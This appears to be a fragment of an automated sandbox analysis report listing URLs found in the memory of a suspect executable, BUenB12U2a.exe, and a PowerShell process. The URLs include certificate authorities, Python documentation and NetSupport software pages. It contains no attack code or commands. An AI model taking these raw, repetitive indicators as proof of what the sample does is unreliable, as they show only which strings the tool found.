                                Source: BUenB12U2a.exe, 00000001.00000003.1743678024.0000021010B8F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1931443959.0000021010F91000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796609195.0000021010F5A000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930611882.0000021010B63000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796873239.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1931097748.0000021010F7C000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1747967588.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1745222625.0000021010B8F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1744605806.0000021010F8A000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1931237821.0000021010F8D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1938352188.0000021010F93000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746907747.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1745749336.0000021010F5A000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930826490.0000021010BD1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1934539734.0000021010F92000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1931283032.0000021010BD4000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1932131962.0000021010BD7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746596680.0000021010F5A000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1747515012.0000021010F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail
                                Source: BUenB12U2a.exe, 00000001.00000003.1796873239.0000021010A4F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1939147543.0000021010EF6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1957306407.0000021010EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                                Source: BUenB12U2a.exe, 00000001.00000003.1934980415.0000021010F20000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1937676274.0000021010F33000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1932267047.0000021010F19000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1940834545.0000021010F34000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796609195.0000021010EF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746596680.0000021010EF5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1747515012.0000021010EE6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1936653213.0000021010F28000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1937415083.0000021010F31000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1745749336.0000021010F19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                                Source: BUenB12U2a.exe, 00000001.00000003.1934980415.0000021010F20000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1940351339.0000021010F20000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1932267047.0000021010F19000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796609195.0000021010EF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746596680.0000021010EF5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1747515012.0000021010EE6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1933216068.0000021010F4B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1931303850.0000021010F3D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1745749336.0000021010F19000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1932411030.0000021010F43000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1945256061.0000021010F20000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1931354269.0000021010F42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://httpbin.org/
                                Source: BUenB12U2a.exe, 00000001.00000003.1746422950.0000021011092000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1963031389.0000021011604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mail.python.org/pipermail/python-dev/2012-June/120787.html.
                                Source: powershell.exe, 00000003.00000002.1860929836.0000027310075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1928960191.00000210111F5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929951602.00000210111F5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1904345143.0000021011161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
                                Source: BUenB12U2a.exe, 00000001.00000003.1928713157.0000021011194000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1903832309.000002101113D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1904345143.0000021011147000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929668680.0000021011199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                                Source: BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: BUenB12U2a.exe, 00000000.00000002.1979574044.0000021D68871000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68871000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: BUenB12U2a.exe, 00000000.00000002.1979574044.0000021D68871000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68871000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                Source: BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                Source: BUenB12U2a.exe, 00000001.00000003.1796297980.0000021011134000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796297980.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796447903.00000210111C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                Source: powershell.exe, 00000003.00000002.1842446007.0000027300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: BUenB12U2a.exe, 00000001.00000003.1743678024.0000021010B8F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1739658195.0000021010BBC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1933279770.0000021010B8B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1739499963.0000021010BBB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738266697.0000021010BA4000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930611882.0000021010B63000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796873239.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1747967588.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1937139834.0000021010BD0000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1745222625.0000021010B8F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1962436230.0000021011290000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746907747.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1936047890.0000021010BC1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1738351251.0000021010BC7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740810132.0000021010BBB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1742241116.0000021010B92000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1932364121.0000021010B7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://python-requests.org
                                Source: BUenB12U2a.exe, 00000001.00000003.1948688209.0000021010811000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930450785.0000021011112000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1932506659.0000021011113000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1951552826.0000021011118000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1958746759.0000021010812000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1936290027.0000021011118000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1955662586.0000021011118000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1935167012.0000021010A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
                                Source: powershell.exe, 00000003.00000002.1842446007.0000027300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: powershell.exe, 00000003.00000002.1842446007.0000027300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 00000003.00000002.1842446007.0000027300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: BUenB12U2a.exe, 00000001.00000003.1796297980.0000021011134000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796297980.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796447903.00000210111C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: BUenB12U2a.exe, 00000001.00000003.1796297980.0000021011134000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796297980.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796447903.00000210111C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: BUenB12U2a.exe, 00000001.00000003.1796297980.0000021011134000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796297980.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796447903.00000210111C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: BUenB12U2a.exe, 00000001.00000003.1928713157.0000021011194000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1928960191.00000210111F5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929951602.00000210111F5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1904345143.0000021011161000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1903832309.000002101113D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1904345143.0000021011147000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929668680.0000021011199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                                Source: BUenB12U2a.exe, 00000001.00000003.1929201460.0000021011214000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.1928713157.0000021011194000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1903832309.000002101113D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1904345143.0000021011147000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929668680.0000021011199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.1903832309.000002101113D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929712668.000002101113A000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929732476.000002101113D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
                                Source: BUenB12U2a.exe, 00000001.00000003.1928713157.0000021011194000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1903832309.000002101113D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1904345143.0000021011147000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929668680.0000021011199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                                Source: BUenB12U2a.exe, 00000001.00000003.1928713157.0000021011194000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1903832309.000002101113D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1904345143.0000021011147000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929712668.000002101113A000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929668680.0000021011199000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929732476.000002101113D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                                Source: powershell.exe, 00000003.00000002.1842446007.0000027300228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: BUenB12U2a.exe, 00000001.00000003.1904345143.0000021011161000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1955570157.00000210111ED000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1928960191.00000210111E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929951602.00000210111EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
                                Source: BUenB12U2a.exe, 00000001.00000003.1742095486.0000021010F79000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1742095486.0000021010F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                                Source: BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1720942168.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1712569273.0000021D68862000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722697539.0000021D68864000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1722404525.0000021D68864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                Source: BUenB12U2a.exe, 00000001.00000003.1902217476.00000210111E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1932901808.0000021010EEE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1934980415.0000021010EF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1928960191.00000210111E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1929951602.00000210111EA000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1939147543.0000021010EF6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1957306407.0000021010EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                                Source: BUenB12U2a.exe, 00000001.00000003.1743678024.0000021010B8F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796873239.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1747967588.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1954697231.0000021010BDC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1745222625.0000021010B8F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740749418.0000021010E70000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746907747.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1935509376.0000021010BDB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1938446783.0000021010BDB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740810132.0000021010BBB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1741487747.0000021010C25000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1742241116.0000021010B92000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1740185188.0000021010C24000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930390304.0000021010BD8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.1960158386.0000021010BDC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1932131962.0000021010BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                                Source: BUenB12U2a.exe, 00000001.00000003.1742095486.0000021010F79000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1742664359.0000021010F24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                                Source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11
                                Source: BUenB12U2a.exe, 00000001.00000003.1796297980.0000021011134000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796297980.00000210111C7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796447903.00000210111C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com
                                Source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                Source: BUenB12U2a.exe, 00000001.00000003.1801257189.00000210120E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1799989658.00000210118E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: BUenB12U2a.exe, 00000001.00000003.1742095486.0000021010F79000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1742095486.0000021010F26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                                Source: BUenB12U2a.exe, 00000001.00000003.1937823985.00000210118FA000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1956139238.00000210118FB000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1935862182.00000210118E4000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1933068750.00000210118E1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1956270378.0000021011904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
                                Source: BUenB12U2a.exe, 00000001.00000003.1933372942.00000210110DE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1935941257.00000210110DE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1938155885.00000210110DF000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930450785.00000210110DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
